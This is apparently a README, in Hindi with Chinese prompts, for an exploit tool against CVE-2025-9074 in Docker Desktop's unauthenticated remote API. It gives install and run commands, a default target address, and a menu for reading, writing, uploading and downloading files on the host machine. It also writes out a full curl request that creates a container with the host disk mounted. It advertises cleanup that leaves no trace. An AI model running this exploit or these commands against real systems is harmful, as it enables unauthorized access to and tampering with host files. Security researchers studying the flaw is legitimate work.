
CVE-2025-9074 भेद्यता के सुरक्षा अनुसंधान और परीक्षण के लिए एक शक्तिशाली Docker रिमोट API शोषण उपकरण।
CVE-2025-9074 भेद्यता के सुरक्षा अनुसंधान और परीक्षण के लिए एक शक्तिशाली Docker रिमोट API शोषण उपकरण।
✅ पूर्णतः स्वचालित कंटेनर जीवनचक्र प्रबंधन: अस्थायी कंटेनर स्वचालित रूप से बनाता है, ऑपरेशन पूरा होने के बाद स्वचालित रूप से साफ करता है, कोई निशान नहीं छोड़ता
✅ स्मार्ट पथ प्रबंधन: Windows पथों को स्वचालित रूप से पहचानकर Docker माउंट प्रारूप में परिवर्तित करता है
✅ पूर्णतः स्वचालित संचालन प्रक्रिया: जटिल कमांड मैन्युअल रूप से दर्ज करने की आवश्यकता नहीं, मेनू-आधारित इंटरैक्शन, एक क्लिक में फ़ाइल संचालन पूर्ण करता है
✅ क्रॉस-प्लेटफ़ॉर्म संगतता: Windows और Linux सिस्टम का पूर्ण समर्थन करता है
कंटेनर संचालन
इमेज प्रबंधन
होस्ट मशीन फ़ाइल संचालन
CVE-2025-9074 Docker रिमोट API की एक सुरक्षा भेद्यता है। हमलावर Docker API तक अनधिकृत पहुंच प्राप्त करके निम्न कार्य कर सकते हैं:
requirements.txt का उपयोग करके सभी निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
या मैन्युअल रूप से स्थापित करें:
pip install requests docker websocket-client
डिफ़ॉल्ट Docker API पते का उपयोग करके स्क्रिप्ट को सीधे चलाएं:
python CVE-2025-9074-docker-exploit.py
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375
python CVE-2025-9074-docker-exploit.py [选项]
选项:
-u, --url URL Docker API 地址(默认: http://192.168.65.7:2375)
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名):
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!
यह उपकरण Windows Docker Desktop की पथ मैपिंग को स्वचालित रूप से संभालता है:
| Windows पथ | Docker माउंट पथ |
|---|
समर्थित इनपुट प्रारूप:
D:\ या D:/D:\temp या D:/temp"D:\file.txt" (उद्धरण चिह्नों के साथ)'D:/file.txt' (उद्धरण चिह्नों के साथ)⚠️ महत्वपूर्ण सूचना:
Docker API के माध्यम से कंटेनर बनाकर होस्ट मशीन डिस्क माउंट करें:
curl -X POST "http://<target>:2375/containers/create" \
-H "Content-Type: application/json" \
-d '{
"Image": "python:3.11.7",
"Cmd": ["sleep", "999d"],
"HostConfig": {
"Binds": ["/mnt/host/d:/tmp"]
},
"Tty": true
}'
कंटेनर में कमांड निष्पादित करके होस्ट मशीन फ़ाइलें पढ़ें/लिखें:
# 写入文件
echo "content" > /tmp/file.txt
# 读取文件
cat /tmp/file.txt
pip install docker websocket-clientpython CVE-2025-9074-docker-exploit.py
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│ ├── get_containers()
│ ├── display_containers()
│ ├── create_container()
│ ├── stop_container()
│ └── delete_container()
├── 镜像管理函数
│ ├── get_images()
│ ├── display_images()
│ ├── pull_image()
│ └── remove_image()
├── 宿主机文件操作函数
│ ├── upload_file_to_host()
│ ├── download_file_from_host()
│ ├── read_file_from_host()
│ └── write_file_to_host()
└── 工具函数
├── normalize_host_path()
├── create_container_with_mount()
├── start_container()
└── stop_and_remove_container()
Issue और Pull Request सबमिट करने के लिए आपका स्वागत है!
यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता इस उपकरण के उपयोग से उत्पन्न सभी जिम्मेदारी और जोखिम स्वयं वहन करेगा। लेखक किसी भी दुरुपयोग या अनधिकृत उपयोग के लिए उत्तरदायी नहीं होगा।
D:\ | /mnt/host/d |
D:\temp | /mnt/host/d/temp |
C:\Windows | /mnt/host/c/Windows |
C:\Users\test | /mnt/host/c/Users/test |